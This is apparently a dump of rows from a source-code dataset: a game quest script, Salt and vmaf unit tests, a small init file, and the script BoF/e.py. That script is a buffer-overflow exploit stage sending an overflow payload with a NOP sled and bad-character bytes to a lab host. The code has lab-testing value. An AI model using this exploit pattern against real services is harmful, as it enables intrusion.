| 0.814286
| 18
| 140
| 6.277778
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 140
| 4
| 46
| 35
| 0.94958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8a1a829b4dbb0c00294b52cd86ddfa171fe338f3
| 914
|
py
|
Python
|
scripts/quest/q21300s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/quest/q21300s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/quest/q21300s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# 21300 - [Job Adv] (Lv.60) Aran
sm.setSpeakerID(1510009)
sm.sendNext("How is the training going? Hm, Lv. 60? You still ahve a long way to go, but it's definitely praiseworthy compared to the first time I met you. Continue to train diligently, and I'm sure you'll regain your strength soon!")
if sm.sendAskYesNo("But first, you must head to #b#m140000000##k your #b#p1201001##k is acting weird again. I think it has something to tell you. It might be able to restore your abilities, so please hurry."):
sm.startQuest(parentID)
sm.sendSayOkay("Anyway, I thought it was really something that a weapon had its own identity, but this weapon gets extremely annoying. It cries, saying that I'm not paying attention to its needs, and now... Oh, please keep this a secret from the Polearm. I don't think it's a good idea to upset the weapon any more than I already have.")
sm.dispose()
else:
sm.dispose()
| 101.555556
| 341
| 0.742888
| 165
| 914
| 4.115152
| 0.660606
| 0.011782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042497
| 0.176149
| 914
| 9
| 342
| 101.555556
| 0.85923
| 0.035011
| 0
| 0.25
| 0
| 0.375
| 0.821793
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a265c3a9d17117b2b41894cda98bd502b87b8e5
| 14,645
|
py
|
Python
|
tests/unit/modules/test_virtualenv.py
|
nevins-b/salt
|
56363bc41ca36e757103df3504d1bb07e3a7251b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/modules/test_virtualenv.py
|
nevins-b/salt
|
56363bc41ca36e757103df3504d1bb07e3a7251b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/modules/test_virtualenv.py
|
nevins-b/salt
|
56363bc41ca36e757103df3504d1bb07e3a7251b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Pedro Algarvio (pedro@algarvio.me)`
tests.unit.modules.virtualenv_test
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libraries
from __future__ import absolute_import
import sys
# Import Salt Testing libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.helpers import TestsLoggingHandler, ForceImportErrorOn
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, MagicMock, patch
# Import salt libs
import salt.modules.virtualenv_mod as virtualenv_mod
from salt.exceptions import CommandExecutionError
@skipIf(NO_MOCK, NO_MOCK_REASON)
@patch('salt.utils.which', lambda bin_name: bin_name)
class VirtualenvTestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
base_virtualenv_mock = MagicMock()
base_virtualenv_mock.__version__ = '1.9.1'
sys_modules_patcher = patch.dict('sys.modules', {'virtualenv': base_virtualenv_mock})
sys_modules_patcher.start()
self.addCleanup(sys_modules_patcher.stop)
return {
virtualenv_mod: {
'__opts__': {'venv_bin': 'virtualenv'},
'_install_script': MagicMock(return_value={'retcode': 0,
'stdout': 'Installed script!',
'stderr': ''})
}
}
def test_issue_6029_deprecated_distribute(self):
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', system_site_packages=True, distribute=True
)
mock.assert_called_once_with(
['virtualenv', '--distribute', '--system-site-packages', '/tmp/foo'],
runas=None,
python_shell=False
)
with TestsLoggingHandler() as handler:
# Let's fake a higher virtualenv version
virtualenv_mock = MagicMock()
virtualenv_mock.__version__ = '1.10rc1'
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
with patch.dict('sys.modules', {'virtualenv': virtualenv_mock}):
virtualenv_mod.create(
'/tmp/foo', system_site_packages=True, distribute=True
)
mock.assert_called_once_with(
['virtualenv', '--system-site-packages', '/tmp/foo'],
runas=None,
python_shell=False
)
# Are we logging the deprecation information?
self.assertIn(
'INFO:The virtualenv \'--distribute\' option has been '
'deprecated in virtualenv(>=1.10), as such, the '
'\'distribute\' option to `virtualenv.create()` has '
'also been deprecated and it\'s not necessary anymore.',
handler.messages
)
def test_issue_6030_deprecated_never_download(self):
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', never_download=True
)
mock.assert_called_once_with(
['virtualenv', '--never-download', '/tmp/foo'],
runas=None,
python_shell=False
)
with TestsLoggingHandler() as handler:
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
# Let's fake a higher virtualenv version
virtualenv_mock = MagicMock()
virtualenv_mock.__version__ = '1.10rc1'
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
with patch.dict('sys.modules',
{'virtualenv': virtualenv_mock}):
virtualenv_mod.create(
'/tmp/foo', never_download=True
)
mock.assert_called_once_with(['virtualenv', '/tmp/foo'],
runas=None,
python_shell=False)
# Are we logging the deprecation information?
self.assertIn(
'INFO:The virtualenv \'--never-download\' option has been '
'deprecated in virtualenv(>=1.10), as such, the '
'\'never_download\' option to `virtualenv.create()` has '
'also been deprecated and it\'s not necessary anymore.',
handler.messages
)
def test_issue_6031_multiple_extra_search_dirs(self):
extra_search_dirs = [
'/tmp/bar-1',
'/tmp/bar-2',
'/tmp/bar-3'
]
# Passing extra_search_dirs as a list
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', extra_search_dir=extra_search_dirs
)
mock.assert_called_once_with(
['virtualenv',
'--extra-search-dir=/tmp/bar-1',
'--extra-search-dir=/tmp/bar-2',
'--extra-search-dir=/tmp/bar-3',
'/tmp/foo'],
runas=None,
python_shell=False
)
# Passing extra_search_dirs as comma separated list
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', extra_search_dir=','.join(extra_search_dirs)
)
mock.assert_called_once_with(
['virtualenv',
'--extra-search-dir=/tmp/bar-1',
'--extra-search-dir=/tmp/bar-2',
'--extra-search-dir=/tmp/bar-3',
'/tmp/foo'],
runas=None,
python_shell=False
)
def test_unapplicable_options(self):
# ----- Virtualenv using pyvenv options ----------------------------->
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='virtualenv',
upgrade=True
)
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='virtualenv',
symlinks=True
)
# <---- Virtualenv using pyvenv options ------------------------------
# ----- pyvenv using virtualenv options ----------------------------->
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock,
'cmd.which_bin': lambda _: 'pyvenv'}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='pyvenv',
python='python2.7'
)
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='pyvenv',
prompt='PY Prompt'
)
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='pyvenv',
never_download=True
)
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='pyvenv',
extra_search_dir='/tmp/bar'
)
# <---- pyvenv using virtualenv options ------------------------------
def test_get_virtualenv_version_from_shell(self):
with ForceImportErrorOn('virtualenv'):
# ----- virtualenv binary not available ------------------------->
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
)
# <---- virtualenv binary not available --------------------------
# ----- virtualenv binary present but > 0 exit code ------------->
mock = MagicMock(side_effect=[
{'retcode': 1, 'stdout': '', 'stderr': 'This is an error'},
{'retcode': 0, 'stdout': ''}
])
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
self.assertRaises(
CommandExecutionError,
virtualenv_mod.create,
'/tmp/foo',
venv_bin='virtualenv',
)
# <---- virtualenv binary present but > 0 exit code --------------
# ----- virtualenv binary returns 1.9.1 as its version --------->
mock = MagicMock(side_effect=[
{'retcode': 0, 'stdout': '1.9.1'},
{'retcode': 0, 'stdout': ''}
])
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', never_download=True
)
mock.assert_called_with(
['virtualenv', '--never-download', '/tmp/foo'],
runas=None,
python_shell=False
)
# <---- virtualenv binary returns 1.9.1 as its version ----------
# ----- virtualenv binary returns 1.10rc1 as its version ------->
mock = MagicMock(side_effect=[
{'retcode': 0, 'stdout': '1.10rc1'},
{'retcode': 0, 'stdout': ''}
])
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', never_download=True
)
mock.assert_called_with(
['virtualenv', '/tmp/foo'],
runas=None,
python_shell=False
)
# <---- virtualenv binary returns 1.10rc1 as its version --------
def test_python_argument(self):
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create(
'/tmp/foo', python=sys.executable,
)
mock.assert_called_once_with(
['virtualenv', '--python={0}'.format(sys.executable), '/tmp/foo'],
runas=None,
python_shell=False
)
def test_prompt_argument(self):
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create('/tmp/foo', prompt='PY Prompt')
mock.assert_called_once_with(
['virtualenv', '--prompt=\'PY Prompt\'', '/tmp/foo'],
runas=None,
python_shell=False
)
# Now with some quotes on the mix
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create('/tmp/foo', prompt='\'PY\' Prompt')
mock.assert_called_once_with(
['virtualenv', "--prompt=''PY' Prompt'", '/tmp/foo'],
runas=None,
python_shell=False
)
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create('/tmp/foo', prompt='"PY" Prompt')
mock.assert_called_once_with(
['virtualenv', '--prompt=\'"PY" Prompt\'', '/tmp/foo'],
runas=None,
python_shell=False
)
def test_clear_argument(self):
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create('/tmp/foo', clear=True)
mock.assert_called_once_with(
['virtualenv', '--clear', '/tmp/foo'],
runas=None,
python_shell=False
)
def test_upgrade_argument(self):
# We test for pyvenv only because with virtualenv this is un
# unsupported option.
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create('/tmp/foo', venv_bin='pyvenv', upgrade=True)
mock.assert_called_once_with(
['pyvenv', '--upgrade', '/tmp/foo'],
runas=None,
python_shell=False
)
def test_symlinks_argument(self):
# We test for pyvenv only because with virtualenv this is un
# unsupported option.
mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
virtualenv_mod.create('/tmp/foo', venv_bin='pyvenv', symlinks=True)
mock.assert_called_once_with(
['pyvenv', '--symlinks', '/tmp/foo'],
runas=None,
python_shell=False
)
| 41.253521
| 93
| 0.513076
| 1,374
| 14,645
| 5.203057
| 0.130277
| 0.089103
| 0.045461
| 0.073996
| 0.785564
| 0.762764
| 0.753252
| 0.718982
| 0.712547
| 0.689047
| 0
| 0.009341
| 0.349403
| 14,645
| 354
| 94
| 41.370057
| 0.740974
| 0.099078
| 0
| 0.602113
| 0
| 0
| 0.154624
| 0.019775
| 0
| 0
| 0
| 0
| 0.088028
| 1
| 0.038732
| false
| 0
| 0.03169
| 0
| 0.077465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a40ecd712456d496991403730a5138a1a6da70c
| 1,759
|
py
|
Python
|
BoF/e.py
|
StefanAustin/pentesting
|
c3b828a7b00fa5f22b87b319d4d7b0de0741d3c3
|
[
"MIT"
] | 1
|
2021-08-04T18:38:51.000Z
|
2021-08-04T18:38:51.000Z
|
BoF/e.py
|
StefanAustin/pentesting
|
c3b828a7b00fa5f22b87b319d4d7b0de0741d3c3
|
[
"MIT"
] | null | null | null |
BoF/e.py
|
StefanAustin/pentesting
|
c3b828a7b00fa5f22b87b319d4d7b0de0741d3c3
|
[
"MIT"
] | 1
|
2020-12-10T08:56:46.000Z
|
2020-12-10T08:56:46.000Z
|
#06-20-2020 DC: This is a client, not a server.
#06-20-2020 DC: This e.py script will send badchars for testing.
#06-20-2020 DC: This time, I know that \x0A is not going to work in the gatekeeper.exe application, so I'll replace it
#06-20-2020 DC: with a \x09 to see if that makes it through to the dump.
#!/usr/bin/python
import socket
target_host = "10.0.2.7"
target_port = 31337
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
nops = "\x90" * 15
payload = "A" * 142 + "B" * 4 + nops + badchars + "\x0A" * 2
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host,target_port))
client.send("GET / HTTP/1.0\r\nHOST: 10.0.2.7\r\n\r\n")
client.send("220 " + payload + "\r\n")
response = client.recv(4096)
| 54.96875
| 134
| 0.7112
| 389
| 1,759
| 3.200514
| 0.845758
| 0.012851
| 0.025703
| 0.032129
| 0.033735
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238037
| 0.073337
| 1,759
| 31
| 135
| 56.741935
| 0.525767
| 0.181353
| 0
| 0
| 0
| 0.473684
| 0.756794
| 0.710801
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a4981ede43a7a5ca18fe7ff6ff514e6ce231002
| 1,996
|
py
|
Python
|
python/test/executor_test.py
|
robbie-nichols/vmaf
|
37c2232e78c7ea25758fee70801d5f2141f5e059
|
[
"Apache-2.0"
] | 2
|
2020-10-08T01:49:25.000Z
|
2021-05-20T03:16:59.000Z
|
python/test/executor_test.py
|
weizhou-geek/vmaf
|
d5978d15f7c413e8aa78c891ce43291ead3fa287
|
[
"Apache-2.0"
] | null | null | null |
python/test/executor_test.py
|
weizhou-geek/vmaf
|
d5978d15f7c413e8aa78c891ce43291ead3fa287
|
[
"Apache-2.0"
] | 2
|
2021-03-03T10:00:36.000Z
|
2021-03-03T10:11:10.000Z
|
import unittest
from vmaf.core.asset import Asset
from vmaf.core.executor import Executor
__copyright__ = "Copyright 2016-2019, Netflix, Inc."
__license__ = "Apache, Version 2.0"
class ExecutorTest(unittest.TestCase):
def test_get_workfile_yuv_type(self):
asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
asset_dict={}, workdir_root="my_workdir_root")
self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv420p')
asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
asset_dict={'ref_yuv_type': 'notyuv', 'dis_yuv_type': 'notyuv'}, workdir_root="my_workdir_root")
self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv420p')
asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
asset_dict={'ref_yuv_type': 'yuv444p', 'dis_yuv_type': 'notyuv'}, workdir_root="my_workdir_root")
self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv444p')
with self.assertRaises(AssertionError):
asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
asset_dict={'ref_yuv_type': 'yuv444p', 'dis_yuv_type': 'yuv420p'}, workdir_root="my_workdir_root")
self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv444p')
asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
asset_dict={'ref_yuv_type': 'notyuv', 'dis_yuv_type': 'yuv422p'}, workdir_root="my_workdir_root")
self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv422p')
asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
asset_dict={'ref_yuv_type': 'yuv444p', 'dis_yuv_type': 'yuv444p'}, workdir_root="my_workdir_root")
self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv444p')
| 53.945946
| 124
| 0.668337
| 260
| 1,996
| 4.730769
| 0.173077
| 0.096748
| 0.079675
| 0.102439
| 0.790244
| 0.790244
| 0.790244
| 0.790244
| 0.790244
| 0.790244
| 0
| 0.03567
| 0.185371
| 1,996
| 36
| 125
| 55.444444
| 0.720787
| 0
| 0
| 0.423077
| 0
| 0
| 0.197896
| 0
| 0
| 0
| 0
| 0
| 0.269231
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a61fee32e82caa5ba15067a554201b0aab50824
| 117
|
py
|
Python
|
h/emails/__init__.py
|
project-star/h
|
fd1decafdce981b681ef3bd59e001b1284498dae
|
[
"MIT"
] | 1
|
2017-06-16T14:01:28.000Z
|
2017-06-16T14:01:28.000Z
|
h/emails/__init__.py
|
project-star/h
|
fd1decafdce981b681ef3bd59e001b1284498dae
|
[
"MIT"
] | null | null | null |
h/emails/__init__.py
|
project-star/h
|
fd1decafdce981b681ef3bd59e001b1284498dae
|
[
"MIT"
] | 1
|
2020-02-16T08:04:56.000Z
|
2020-02-16T08:04:56.000Z
|
# -*- coding: utf-8 -*-
from h.emails import reply_notification, signup
__all__ = ('reply_notification', 'signup')
| 19.5
| 47
| 0.700855
| 14
| 117
| 5.428571
| 0.785714
| 0.447368
| 0.605263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009901
| 0.136752
| 117
| 5
| 48
| 23.4
| 0.742574
| 0.179487
| 0
| 0
| 0
| 0
| 0.255319
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.